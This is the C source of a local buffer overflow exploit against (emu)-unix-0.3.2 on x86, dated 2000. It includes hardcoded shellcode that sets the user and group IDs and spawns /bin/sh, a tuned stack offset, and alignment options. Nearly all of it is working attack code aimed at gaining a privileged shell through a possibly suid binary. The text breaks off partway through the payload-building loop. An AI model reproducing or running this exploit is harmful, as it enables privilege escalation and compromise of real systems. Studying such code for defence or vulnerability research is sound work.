/* (emu)-unix-0.3.2 local buffer overflow - x86. * Author: Cody Tubbs (loophole of hhp). * Site: www.hhp-programming.net * Email: pigspigs@yahoo.com * Date: 2.2.2000 * * Note: No 'make install' within the Makefile, possible suid. * (This exploit probably wont be on our site long). */ #include #define OFFSET -9676 // Worked for me on Slack 7.0, also -[9668/9640/9636/etc]. #define ALLIGN 0 // Doesn't need to be changed. #define NOP 0x90 #define DBUF 400 static char shellcode[]= "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" "\x66\x31\xc0\x66\x31\xdb\xb0\x2e" "\xcd\x80\xeb\x1f\x5e\x89\x76\x08" "\x31\xc0\x88\x46\x07\x89\x46\x0c" "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d" "\x56\x0c\xcd\x80\x31\xdb\x89\xd8" "\x40\xcd\x80\xe8\xdc\xff\xff\xff" "/bin/sh\x69"; long get_sp(void){__asm__("movl %esp,%eax");} void workit(char *heh){ fprintf(stderr, "(emu)-unix-0.3.2 local buffer overflow - x86.\n"); fprintf(stderr, "Author: Cody Tubbs (loophole of hhp).\n"); fprintf(stderr, "Usage: %s [offset] [allign(0..3)]\n", heh); } main(int argc, char **argv){ char eipeip[DBUF], buffer[7192], heh[DBUF+1]; int i, offset, gid, allign; long address; workit(argv[0]); if(argc>1){offset=atoi(argv[1]);}else{offset=OFFSET;} if(argc>2){allign=atoi(argv[2]);}else{allign=ALLIGN;} address=get_sp()-offset; if(allign>0){for(i=0;i